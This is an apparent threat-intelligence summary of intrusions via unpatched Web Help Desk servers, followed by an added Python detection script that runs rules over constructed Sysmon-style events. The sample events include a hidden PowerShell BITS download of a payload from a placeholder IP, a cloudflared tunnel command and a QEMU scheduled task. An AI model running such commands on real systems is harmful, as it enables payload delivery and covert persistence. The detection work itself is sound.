Overview
- Microsoft and Huntress report ongoing intrusions through internet-exposed, unpatched Web Help Desk servers, with the specific initial vulnerability still unconfirmed across cases.
- After access, attackers deploy Zoho Assist/ManageEngine for unattended remote control and conduct Active Directory discovery with hands-on-keyboard activity.
- Threat actors use Velociraptor as a command-and-control framework via Cloudflare Workers and add Cloudflared tunnels for redundant persistence, in some cases using an outdated Velociraptor build with a known privilege escalation flaw.
- Observed tradecraft includes PowerShell leveraging BITS for payloads, DLL sideloading via wab.exe to dump LSASS, reverse SSH/RDP access, QEMU-based scheduled tasks for stealth, and at least one DCSync credential theft.
- CISA added CVE-2025-40551 to its Known Exploited Vulnerabilities list as vendors advise upgrading WHD to 2026.1 or later, removing public admin access, rotating credentials, and evicting unauthorized tools, with Huntress noting incidents across three of its 78 WHD customers.
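As an added example (not part of the report above, and not Microsoft's, Huntress's or SolarWinds' own tooling), the Python sweep below turns the tradecraft listed in these bullets into simple detection rules and runs them over constructed, Sysmon-style telemetry. The hostnames, file paths, the `WebHelpDesk` install-directory substring used to spot children of the WHD service, the `.workers.dev` suffix as the Cloudflare Workers domain, and `C:\Program Files\Windows Mail` as the legitimate `wab.exe` location are all assumptions made for illustration.

```python
"""Detection sweep for the Web Help Desk intrusion tradecraft summarised above.

Added example, not from the original report. Sample events are constructed
(hypothetical hosts, paths, IPs and domains) and loosely shaped like
Sysmon process-create (1), network-connect (3) and Security 4698 task events.
"""
import re
from typing import Dict, List, Tuple

# Assumptions used by the rules (illustrative, adjust to your environment).
WAB_EXPECTED_DIR = r"c:\program files\windows mail"   # legitimate wab.exe location
WHD_PARENT_HINT = "webhelpdesk"                        # substring of the WHD install path
WORKERS_SUFFIX = ".workers.dev"                        # Cloudflare Workers hostnames
BROWSER_ALLOWLIST = ("chrome.exe", "msedge.exe", "firefox.exe")

# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "host": "whd-srv01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Start-BitsTransfer -Source http://198.51.100.7/p.bin -Destination C:\Users\Public\p.bin",
     "parent": r"C:\Program Files\WebHelpDesk\bin\java.exe"},
    {"type": "process", "host": "whd-srv01", "image": r"C:\Users\Public\wab.exe",
     "cmdline": "wab.exe", "parent": "cmd.exe"},
    {"type": "process", "host": "whd-srv01", "image": r"C:\Program Files\Windows Mail\wab.exe",
     "cmdline": "wab.exe", "parent": "explorer.exe"},
    {"type": "process", "host": "whd-srv01", "image": r"C:\ProgramData\cf\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token eyJ...", "parent": "cmd.exe"},
    {"type": "task", "host": "whd-srv01", "task": "WindowsUpdateHelper",
     "cmdline": r"C:\ProgramData\q\qemu-system-x86_64.exe -m 256 -nographic -drive file=vm.qcow2"},
    {"type": "network", "host": "whd-srv01", "image": r"C:\ProgramData\v\svchost.exe",
     "dest": "api-sync.example.workers.dev", "port": "443"},
    {"type": "network", "host": "whd-srv01", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest": "www.example.com", "port": "443"},
]

Finding = Tuple[str, str, str]  # (rule name, host, evidence)


def check_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply every rule to one event and return the findings it produces."""
    hits: List[Finding] = []
    kind = ev["type"]
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    parent = ev.get("parent", "").lower()
    basename = image.rsplit("\\", 1)[-1]

    if kind == "process":
        # Any child of the WHD service process is suspicious on a server that
        # should only ever serve the web application.
        if WHD_PARENT_HINT in parent:
            hits.append(("whd_spawned_child", ev["host"], ev["image"]))
        # PowerShell using BITS to fetch a payload.
        if basename == "powershell.exe" and re.search(r"start-bitstransfer|bitsadmin", cmd):
            hits.append(("powershell_bits_download", ev["host"], ev["cmdline"]))
        # wab.exe copied out of its install directory is the classic sideloading setup.
        if basename == "wab.exe" and not image.startswith(WAB_EXPECTED_DIR):
            hits.append(("wab_exe_outside_expected_path", ev["host"], ev["image"]))
        # Cloudflared tunnel client, used here for redundant persistence.
        if basename == "cloudflared.exe" or "cloudflared" in cmd:
            hits.append(("cloudflared_tunnel", ev["host"], ev["cmdline"]))
    elif kind == "task":
        # Scheduled task whose action launches QEMU.
        if "qemu" in cmd:
            hits.append(("scheduled_task_qemu", ev["host"], ev["task"]))
    elif kind == "network":
        # Non-browser process talking to a Workers hostname (Velociraptor C2 path).
        dest = ev.get("dest", "").lower()
        if dest.endswith(WORKERS_SUFFIX) and basename not in BROWSER_ALLOWLIST:
            hits.append(("process_to_workers_dev", ev["host"], f"{ev['image']} -> {dest}"))
    return hits


def sweep(events: List[Dict[str, str]]) -> List[Finding]:
    """Run check_event over a batch of events and collect all findings."""
    findings: List[Finding] = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


if __name__ == "__main__":
    for rule, host, evidence in sweep(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {evidence}")
```

The rules are deliberately coarse: the point is to show where each reported behaviour surfaces (process parentage, image path versus expected location, task actions, destination hostnames) so that the equivalent queries can be written against real Sysmon, EDR or SIEM data, where each rule should then be tuned against the environment's baseline.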